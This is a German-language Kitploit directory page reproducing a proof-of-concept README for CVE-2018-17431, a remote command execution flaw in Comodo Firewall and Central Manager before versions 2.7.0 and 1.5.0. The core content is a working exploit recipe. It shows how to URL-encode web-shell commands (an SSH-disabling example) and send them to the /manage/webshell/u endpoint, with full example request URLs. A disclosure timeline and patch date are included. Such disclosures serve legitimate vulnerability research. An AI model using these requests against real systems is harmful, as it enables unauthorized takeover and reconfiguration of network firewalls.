Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2018-17431-PoC — Proof of Concept für CVE-2018-17431 | Kitploit
Tools/GitHubGitHub/fadavvi/cve-2018-17431-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-ToolArchived
GitHubfadavvi/cve-2018-17431-poc

CVE-2018-17431-PoC

Proof of Concept für CVE-2018-17431

Repository anzeigen
23vor 5 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2018-17431-PoC

Beweis des Konzepts für CVE-2018-17431

Exploit-Titel: Comodo Firewall & Central Manager (UTM) Alle Versionen vor 2.7.0 & 1.5.0 Remote-Befehlsausführung (Web-Shell-basiert)

Exploit-Autor: Milad Fadavvi

Hersteller-Homepage: https://www.comodo.com/

Software-Link: https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276

Version: vor 2.7.0 & 1.5.0

Getestet auf: Windows:firefox/chrome - Kali:firefox

Entdeckungsdatum: 2018-08-15 (am selben Tag gemeldet)

Bestätigung, dass der Fehler existiert: 2018-09-22 (Ticket-ID: XWR-503-79437)

Patch veröffentlicht: 2018-11-23 Versionshinweise von Comodo

Exploit:

  1. WebShell-Simulation:

    root@kitploit:~
     For example disable SSH in web shell is like this:
         - service [hit enter]
         - ssh [hit enter]
         - disable [hit enter]
    
  2. Codieren

    root@kitploit:~
     make above sequense encode with URL ECODING
     (I used burp encoder plugin)
    
     %73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a
    
  3. Ausführen

    root@kitploit:~
     Base URL: https://[Comodo_Firewall_IP]:[WebPort]/manage/webshell/u?s=[Integer]&w=100&h=24&k=[Encoded_Command]&l=[Integer]&_=1534440840152
     
     
               https://[Comodo_Firewall_IP]:[WebPort]/manage/webshell/u?s=[Integer]&w=100&h=24&k=%0a&l=[Integer]&_=1534440840152 (extra enter key for run the command)
               
    
     Example: https://192.168.250.10:10443/manage/webshell/u?s=4&w=100&h=24&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=21&_=1534440840152
     
           https://192.168.250.10:10443/manage/webshell/u?s=4&w=100&h=24&k=%0a&l=21&_=1534440840152
    

Eine Seite mit der Meldung "Configuration has been altered" wird angezeigt und die Konfiguration wurde geändert!

Mit dieser Technik können wir alle WebShell-Befehle simulieren.

Tool herunterladen